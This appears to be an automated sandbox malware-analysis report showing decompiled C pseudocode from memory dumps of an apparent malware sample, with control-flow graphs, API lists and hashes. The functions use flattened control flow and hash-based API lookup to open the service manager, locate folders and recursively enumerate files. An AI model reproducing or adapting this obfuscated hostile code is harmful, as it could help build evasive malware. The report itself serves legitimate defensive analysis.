                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 003E04F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 003E0519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 003E0530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 003E0547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 003E0562
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256690931.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3e0000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: 430ebc13fb106e7c029d35ab3f92e34e4a669b6e660fd92e9565d09a4909e707
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: EC4150B19043A46EE715EB63C846F6FB3EDAB88740F408E1CB7449B2C1D6B4D9448B62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 524 3f9860-3f9878 525 3f9880-3f9885 524->525 526 3f988b 525->526 527 3f99e2-3f99e7 525->527 530 3f998e-3f9995 526->530 531 3f9891-3f9896 526->531 528 3f99ed 527->528 529 3f9ae3-3f9ae8 527->529 534 3f9a73-3f9a7a 528->534 535 3f99f3-3f99f8 528->535 532 3f9aea-3f9aef 529->532 533 3f9b02-3f9b09 529->533 536 3f9997-3f99ad call 3f3f00 call 3f3e60 530->536 537 3f99b2-3f99c1 OpenSCManagerW 530->537 538 3f989c 531->538 539 3f9936-3f993b 531->539 532->525 544 3f9af5-3f9b01 532->544 546 3f9b0b-3f9b21 call 3f3f00 call 3f3e60 533->546 547 3f9b26-3f9b44 SHGetFolderPathW call 3f3040 533->547 551 3f9a7c-3f9a92 call 3f3f00 call 3f3e60 534->551 552 3f9a97-3f9aa2 534->552 548 3f99fa-3f99ff 535->548 549 3f9a42-3f9a49 535->549 536->537 540 3f99d8-3f99dd 537->540 541 3f99c3-3f99d3 537->541 542 3f9927-3f9931 call 3f7c60 538->542 543 3f98a2-3f98a7 538->543 539->532 545 3f9941-3f9949 539->545 540->525 541->525 542->525 553 3f98a9-3f98ae 543->553 554 3f9905-3f9922 543->554 562 3f994b-3f9963 call 3f3f00 call 3f3e60 545->562 563 3f9969-3f9989 SHGetFolderPathW 545->563 546->547 568 3f9b49 547->568 548->532 556 3f9a05-3f9a3d 548->556 557 3f9a4b-3f9a61 call 3f3f00 call 3f3e60 549->557 558 3f9a66-3f9a6e CloseServiceHandle 549->558 551->552 581 3f9abf-3f9ad0 552->581 582 3f9aa4-3f9aba call 3f3f00 call 3f3e60 552->582 553->532 565 3f98b4-3f98bb 553->565 554->525 556->525 557->558 558->525 562->563 563->525 574 3f98bd-3f98d3 call 3f3f00 call 3f3e60 565->574 575 3f98d8-3f9900 call 3f3d00 565->575 578 3f9b4c-3f9b58 568->578 574->575 575->525 581->578 599 3f9ad2-3f9ade 581->599 582->581 599->525
                                                        C-Code - Quality: 73%
                                                        			E003F9860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x3fe310;
                                                        							if( *0x3fe310 == 0) {
                                                        								 *0x3fe310 = E003F3E60(_t64, E003F3F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x3fe54c; // 0x55f0b0
                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x3fdbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E003F3E60(_t64, E003F3F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x3fdbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x3fe54c; // 0x55f0b0
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E003F7C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x3fe3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E003F3E60(_t64, E003F3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x3fe3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E003F3D00( &_v536);
                                                        											_t72 =  *0x3fe54c; // 0x55f0b0
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x3fdbd8;
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E003F3E60(_t64, E003F3F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x3fdbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x3fe54c; // 0x55f0b0
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E003F3040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x3fe494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E003F3E60(_t64, E003F3F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x3fe494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x3fdd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E003F3E60(_t64, E003F3F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x3fdd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x3fe54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E003F7E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x3fe18c;
                                                        								if( *0x3fe18c == 0) {
                                                        									 *0x3fe18c = E003F3E60(_t64, E003F3F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x3fe54c; // 0x55f0b0
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x3f7e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x003f9868
                                                        0x003f986a
                                                        0x003f9871
                                                        0x003f9875
                                                        0x003f9875
                                                        0x003f9878
                                                        0x003f9880
                                                        0x003f9880
                                                        0x003f9880
                                                        0x003f9880
                                                        0x003f9885
                                                        0x00000000
                                                        0x00000000
                                                        0x003f988b
                                                        0x003f9993
                                                        0x003f9995
                                                        0x003f99ad
                                                        0x003f99ad
                                                        0x003f99bb
                                                        0x003f99bd
                                                        0x003f99bf
                                                        0x003f99c1
                                                        0x003f99d8
                                                        0x003f99c3
                                                        0x003f99c3
                                                        0x003f99c8
                                                        0x003f99ce
                                                        0x003f99ce
                                                        0x00000000
                                                        0x003f9891
                                                        0x003f9891
                                                        0x003f9896
                                                        0x003f9936
                                                        0x003f993b
                                                        0x00000000
                                                        0x003f9941
                                                        0x003f9941
                                                        0x003f9947
                                                        0x003f9949
                                                        0x003f9961
                                                        0x003f9963
                                                        0x003f9963
                                                        0x003f9969
                                                        0x003f997d
                                                        0x003f997f
                                                        0x003f9981
                                                        0x003f9986
                                                        0x00000000
                                                        0x003f9986
                                                        0x003f989c
                                                        0x003f989c
                                                        0x003f9927
                                                        0x003f992c
                                                        0x00000000
                                                        0x003f98a2
                                                        0x003f98a7
                                                        0x003f9905
                                                        0x003f990d
                                                        0x003f9912
                                                        0x003f991a
                                                        0x00000000
                                                        0x003f98a9
                                                        0x003f98ae
                                                        0x00000000
                                                        0x003f98b4
                                                        0x003f98b4
                                                        0x003f98bb
                                                        0x003f98ce
                                                        0x003f98d3
                                                        0x003f98d3
                                                        0x003f98e4
                                                        0x003f98ea
                                                        0x003f98ef
                                                        0x003f98f5
                                                        0x003f98fb
                                                        0x00000000
                                                        0x003f98fb
                                                        0x003f98ae
                                                        0x003f98a7
                                                        0x003f989c
                                                        0x003f9896
                                                        0x00000000
                                                        0x003f988b
                                                        0x003f99e2
                                                        0x003f99e7
                                                        0x003f9ae3
                                                        0x003f9ae8
                                                        0x003f9b02
                                                        0x003f9b07
                                                        0x003f9b09
                                                        0x003f9b1c
                                                        0x003f9b21
                                                        0x003f9b21
                                                        0x003f9b33
                                                        0x003f9b35
                                                        0x003f9b3e
                                                        0x003f9b3e
                                                        0x003f9b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003f99ed
                                                        0x003f99ed
                                                        0x003f9a73
                                                        0x003f9a78
                                                        0x003f9a7a
                                                        0x003f9a8d
                                                        0x003f9a92
                                                        0x003f9a92
                                                        0x003f9a99
                                                        0x003f9a9b
                                                        0x003f9aa0
                                                        0x003f9aa2
                                                        0x003f9ab5
                                                        0x003f9aba
                                                        0x003f9aba
                                                        0x003f9ac7
                                                        0x003f9ac9
                                                        0x003f9ace
                                                        0x003f9ad0
                                                        0x003f9b4f
                                                        0x003f9b58
                                                        0x003f9ad2
                                                        0x003f9ad2
                                                        0x003f9ad9
                                                        0x00000000
                                                        0x003f9ad9
                                                        0x003f99f3
                                                        0x003f99f3
                                                        0x003f99f8
                                                        0x003f9a47
                                                        0x003f9a49
                                                        0x003f9a61
                                                        0x003f9a61
                                                        0x003f9a67
                                                        0x003f9a69
                                                        0x00000000
                                                        0x003f99fa
                                                        0x003f99fa
                                                        0x003f99ff
                                                        0x00000000
                                                        0x003f9a05
                                                        0x003f9a05
                                                        0x003f9a0d
                                                        0x003f9a12
                                                        0x003f9a17
                                                        0x003f9a1f
                                                        0x003f9a24
                                                        0x003f9a2c
                                                        0x003f9a31
                                                        0x003f9a38
                                                        0x00000000
                                                        0x003f9a38
                                                        0x003f99ff
                                                        0x003f99f8
                                                        0x003f99ed
                                                        0x00000000
                                                        0x003f9aea
                                                        0x003f9aea
                                                        0x003f9aea
                                                        0x003f9b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0055F098), ref: 003F997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003F99BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 003F9A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 003F9B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: 2S$Y4[0
                                                        • API String ID: 2382770032-4131004879
                                                        • Opcode ID: ae5feb292b6a35699333815c2bd61bc41c97ce6b5c9c4f05324f6b89a090913b
                                                        • Instruction ID: 2c24f1c7aabf0c32b0c63e3fc8c049c1d79c23c82ed175bbf31bd5db885bd3ec
                                                        • Opcode Fuzzy Hash: ae5feb292b6a35699333815c2bd61bc41c97ce6b5c9c4f05324f6b89a090913b
                                                        • Instruction Fuzzy Hash: 4A61D471B043095BEB1AAF69AC85B7A3299DBA0744F11042FF305DF3A1EA70CD05CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 818 3f38f0-3f390b 819 3f3910-3f3915 818->819 820 3f391b 819->820 821 3f3a69-3f3a6e 819->821 822 3f3a5f-3f3a64 820->822 823 3f3921-3f3926 820->823 824 3f3acc-3f3adf call 3f34c0 821->824 825 3f3a70-3f3a75 821->825 822->819 826 3f392c-3f3931 823->826 827 3f3a17-3f3a1e 823->827 846 3f3afc-3f3b17 824->846 847 3f3ae1-3f3af7 call 3f3f00 call 3f3e60 824->847 829 3f3a77-3f3a7e 825->829 830 3f3ab6-3f3abb 825->830 834 3f3937-3f393c 826->834 835 3f3b70-3f3b77 826->835 831 3f3a3b-3f3a4f FindFirstFileW 827->831 832 3f3a20-3f3a36 call 3f3f00 call 3f3e60 827->832 837 3f3a9b-3f3ab1 829->837 838 3f3a80-3f3a96 call 3f3f00 call 3f3e60 829->838 830->819 833 3f3ac1-3f3acb 830->833 843 3f3b97-3f3ba1 831->843 844 3f3a55-3f3a5a 831->844 832->831 834->830 845 3f3942-3f3947 834->845 841 3f3b79-3f3b8f call 3f3f00 call 3f3e60 835->841 842 3f3b94 835->842 837->819 838->837 841->842 842->843 844->819 852 3f394d-3f3953 845->852 853 3f39f1-3f3a12 845->853 866 3f3b19-3f3b2f call 3f3f00 call 3f3e60 846->866 867 3f3b34-3f3b3f 846->867 847->846 859 3f3955-3f395d 852->859 860 3f3974-3f3976 852->860 853->819 862 3f396d-3f3972 859->862 870 3f395f-3f3963 859->870 860->862 863 3f3978-3f398b call 3f34c0 860->863 862->819 880 3f398d-3f39a3 call 3f3f00 call 3f3e60 863->880 881 3f39a8-3f39ec call 3f38f0 call 3f3460 863->881 866->867 883 3f3b5c-3f3b6b 867->883 884 3f3b41-3f3b57 call 3f3f00 call 3f3e60 867->884 870->860 876 3f3965-3f396b 870->876 876->860 876->862 880->881 881->819 883->819 884->883
                                                        C-Code - Quality: 63%
                                                        			E003F38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x3fe430 == 0) {
                                                        								 *0x3fe430 = E003F3E60(_t56, E003F3F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x3fdba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E003F3E60(_t56, E003F3F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x3fdba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E003F34C0(0x3fd290);
                                                        											_t50 =  *0x3fe158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E003F3E60(_t56, E003F3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x3fe158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E003F38F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E003F3460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E003F34C0(0x3fd260);
                                                        					_t24 =  *0x3fe158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E003F3E60(_t56, E003F3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x3fe158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x3fe494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E003F3E60(_t56, E003F3F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x3fe494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x3fdf30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E003F3E60(_t56, E003F3F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x3fdf30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x3fdf88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E003F3E60(_t56, E003F3F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x3fdf88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x003f38fa
                                                        0x003f38fc
                                                        0x003f38fe
                                                        0x003f3902
                                                        0x003f3907
                                                        0x003f3910
                                                        0x003f3910
                                                        0x003f3910
                                                        0x003f3915
                                                        0x00000000
                                                        0x00000000
                                                        0x003f391b
                                                        0x003f3a5f
                                                        0x00000000
                                                        0x003f3921
                                                        0x003f3926
                                                        0x003f3a1e
                                                        0x003f3a36
                                                        0x003f3a36
                                                        0x003f3a48
                                                        0x003f3a4a
                                                        0x003f3a4f
                                                        0x003f3ba1
                                                        0x003f3a55
                                                        0x003f3a55
                                                        0x00000000
                                                        0x003f3a55
                                                        0x003f392c
                                                        0x003f3931
                                                        0x003f3b70
                                                        0x003f3b77
                                                        0x003f3b8a
                                                        0x003f3b8f
                                                        0x003f3b8f
                                                        0x00000000
                                                        0x003f3b95
                                                        0x003f393c
                                                        0x003f3ab6
                                                        0x003f3abb
                                                        0x00000000
                                                        0x003f3acb
                                                        0x003f3acb
                                                        0x003f3acb
                                                        0x003f3942
                                                        0x003f3947
                                                        0x003f39fd
                                                        0x003f3a06
                                                        0x003f3a0d
                                                        0x003f394d
                                                        0x003f3953
                                                        0x003f3974
                                                        0x003f3976
                                                        0x00000000
                                                        0x003f3978
                                                        0x003f3982
                                                        0x003f3984
                                                        0x003f398b
                                                        0x003f399e
                                                        0x003f39a3
                                                        0x003f39a3
                                                        0x003f39bc
                                                        0x003f39d8
                                                        0x003f39dd
                                                        0x003f39e2
                                                        0x003f39e7
                                                        0x003f39e7
                                                        0x003f3955
                                                        0x003f3955
                                                        0x003f395d
                                                        0x003f396d
                                                        0x003f396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003f395d
                                                        0x003f3953
                                                        0x00000000
                                                        0x003f3947
                                                        0x003f393c
                                                        0x003f3926
                                                        0x00000000
                                                        0x003f391b
                                                        0x003f3a6e
                                                        0x003f3ad6
                                                        0x003f3ad8
                                                        0x003f3adf
                                                        0x003f3af2
                                                        0x003f3af7
                                                        0x003f3af7
                                                        0x003f3b0b
                                                        0x003f3b0d
                                                        0x003f3b12
                                                        0x003f3b17
                                                        0x003f3b2a
                                                        0x003f3b2f
                                                        0x003f3b2f
                                                        0x003f3b36
                                                        0x003f3b38
                                                        0x003f3b3f
                                                        0x003f3b52
                                                        0x003f3b57
                                                        0x003f3b57
                                                        0x003f3b60
                                                        0x003f3b62
                                                        0x003f3b66
                                                        0x00000000
                                                        0x003f3a70
                                                        0x003f3a75
                                                        0x00000000
                                                        0x003f3a77
                                                        0x003f3a77
                                                        0x003f3a7e
                                                        0x003f3a91
                                                        0x003f3a96
                                                        0x003f3a96
                                                        0x003f3aa1
                                                        0x003f3aa5
                                                        0x003f3aac
                                                        0x00000000
                                                        0x003f3aac
                                                        0x003f3a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 003F3A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: 014395c4e8e225078eeca758015a5bddf379300c0a9c508d17035042a3602d2c
                                                        • Instruction ID: 351c77138b50d5bcec509b8fa9b473fb206eefa714ef47c09f7a1fa41e2c06ee
                                                        • Opcode Fuzzy Hash: 014395c4e8e225078eeca758015a5bddf379300c0a9c508d17035042a3602d2c
                                                        • Instruction Fuzzy Hash: 4E5123717143094BCF26AB79D885B7B36AA9B90740F01092DF756CB3A1EBB5CF058392
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E003F5040(intOrPtr __ecx, intOrPtr __edx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				char _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				void* _v36;
                                                        				intOrPtr _v44;
                                                        				signed int _v52;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t23;
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				void* _t58;
                                                        				intOrPtr* _t101;
                                                        				void* _t103;
                                                        				signed int _t104;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				void* _t108;
                                                        				void* _t112;
                                                        				void* _t115;
                                                        				void* _t116;
                                                        
                                                        				_t101 = _v12;
                                                        				_t58 = 0;
                                                        				_v16 = __edx;
                                                        				_t112 = 0;
                                                        				_v20 = __ecx;
                                                        				_t104 = 0x1ca940c1;
                                                        				while(1) {
                                                        					_t16 = _v28;
                                                        					while(1) {
                                                        						L2:
                                                        						_t115 = _t104 - 0x12f72f95;
                                                        						if(_t115 <= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t104 - 0x26342ffd;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t104 - 0x2fab56c4;
                                                        							if(_t104 != 0x2fab56c4) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t17 =  *0x3fe494;
                                                        								__eflags = _t17;
                                                        								if(_t17 == 0) {
                                                        									_t17 = E003F3E60(_t58, E003F3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        									 *0x3fe494 = _t17;
                                                        								}
                                                        								_t105 =  *_t17();
                                                        								__eflags =  *0x3fdd18;
                                                        								if( *0x3fdd18 == 0) {
                                                        									 *0x3fdd18 = E003F3E60(_t58, E003F3F00(0x9bab0b12), 0x9ff0609c, _t112);
                                                        								}
                                                        								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
                                                        								_t58 = _t16;
                                                        								__eflags = _t58;
                                                        								if(_t58 != 0) {
                                                        									_t104 = 0x8956eec;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t23 =  *0x3fe484;
                                                        								__eflags = _t23;
                                                        								if(_t23 == 0) {
                                                        									_t23 = E003F3E60(_t58, E003F3F00(0x26f5757c), 0x9e91db81, _t112);
